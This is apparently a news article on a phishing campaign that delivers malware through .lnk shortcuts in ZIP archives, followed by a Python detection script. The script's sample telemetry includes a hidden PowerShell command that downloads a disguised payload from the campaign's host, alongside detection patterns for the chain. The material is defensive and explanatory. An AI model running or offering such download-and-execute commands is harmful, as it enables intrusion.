The cybersecurity research firm Blackpoint Cyber has detected a new wave of phishing attacks that exploits users’ trust in sensitive documents. The research, shared with Hackread.com, describes a campaign that uses identity-themed phishing archives.
These contain fake certified documents, passport scans and payment files that deliver malicious code. By using familiar file themes, the attackers increase their chances of success and gain initial access to victims’ systems.
In one case examined for this research, a custom-designed spear phishing message was delivered as a ZIP archive, specifically targeting a senior employee or manager with files mimicking routine executive workflows, including identity verification and payment approvals.
How a simple click can become a security nightmare
The attack begins when a victim receives what looks like a normal but important ZIP file. Inside, the “documents” are actually malicious Windows shortcut files (known as .lnk files). When an unsuspecting user opens one of these shortcuts, it silently runs a hidden PowerShell script in the background.
The Blackpoint Security Operations Center (SOC) team observed this script immediately download a disguised payload from a remote web address (hp05.com/gwt/). To avoid raising suspicion, the downloaded file is named to look like a PowerPoint presentation; however, it is saved on the user’s computer as a malicious DLL, which the researchers describe as “deliberately mislabelled.”
Attackers ‘Living Off the Land’
Once the file is on the user’s computer, the attacker uses a regular Windows component, rundll32.exe, to run the malware. The operating system normally uses this tool for legitimate tasks, but here the attackers “use a signed Windows binary to run attacker code under user context,” according to Blackpoint Cyber’s investigation.
This tactic is called ‘living off the land’ (using built-in system tools), and here it is used to make the malicious activity look like normal Windows operations, helping it bypass many security tools.
The dropper’s most interesting feature is its anti-virus (AV) check. It looks for popular security products such as AVG, Avast and Bitdefender (by checking for processes like avgui or bdagent) and uses the result to choose which malicious file to fetch (BD3V.ppt if AV is present, NORVM.ppt if not), giving it an evasion plan tailored to common security products.
Simply Put:
Using a Windows shortcut file to spread malware is not new, as attackers have been abusing this feature for years to trick users into launching malicious code. What makes the latest campaign notable is how these shortcuts are packaged and delivered.
Instead of obvious executables, the malware is hidden inside ZIP archives disguised as sensitive documents. This multi-stage approach, which combines social engineering with a familiar technique, makes the attack far more convincing, while the antivirus check and the use of built-in Windows tools help it bypass common security controls.
To protect yourself, avoid opening shortcut files casually. Organisations are urged to implement policies that prohibit the execution of shortcut files and to monitor how programs like PowerShell and rundll32.exe operate.
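As an added illustration of the monitoring the article recommends (example code, not from Blackpoint Cyber or Hackread), the following script checks process-creation telemetry for the chain described above: PowerShell launched from Explorer with a remote URL, and rundll32.exe loading a module whose extension is not a DLL-type extension. The event records, PIDs, file paths and the PowerShell command line are constructed for this example; only the hp05.com/gwt/ address and the BD3V.ppt filename come from the article.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style.
# PIDs, paths and the PowerShell command line are made up for this example.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"iwr hp05.com/gwt/BD3V.ppt -OutFile $env:TEMP\\BD3V.ppt\""},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\BD3V.ppt,Start"},
    # Benign: a Control Panel applet launched from Explorer.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# Extensions rundll32 is normally asked to load; anything else is suspicious.
LOADABLE_EXT = {".dll", ".cpl", ".ocx", ".ax"}
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/\S*", re.I)

def image_name(ev):
    """Lower-cased file name of the process image."""
    return ev["image"].rsplit("\\", 1)[-1].lower()

def rundll32_module(cmdline):
    """Module path passed to rundll32: first argument, before the comma."""
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return None
    return parts[1].split(",", 1)[0].strip('"')

def detect(events):
    """Return (pid, reason) findings for the shortcut -> PowerShell -> rundll32 chain."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        name = image_name(ev)
        parent = by_pid.get(ev["ppid"])
        if (name == "powershell.exe" and parent and image_name(parent) == "explorer.exe"
                and URL_RE.search(ev["cmdline"])):
            findings.append((ev["pid"], "powershell spawned from explorer with remote URL"))
        if name == "rundll32.exe":
            module = rundll32_module(ev["cmdline"])
            ext = "." + module.rsplit(".", 1)[-1].lower() if module and "." in module else ""
            if ext not in LOADABLE_EXT:
                findings.append((ev["pid"], f"rundll32 loading non-DLL extension {ext!r}: {module}"))
            if parent and image_name(parent) == "powershell.exe":
                findings.append((ev["pid"], "rundll32 spawned by powershell"))
    return findings
```

Running `detect(EVENTS)` flags the PowerShell download and both rundll32 anomalies while leaving the Control Panel applet alone; in production the same logic would read Sysmon or EDR process events rather than the inline list.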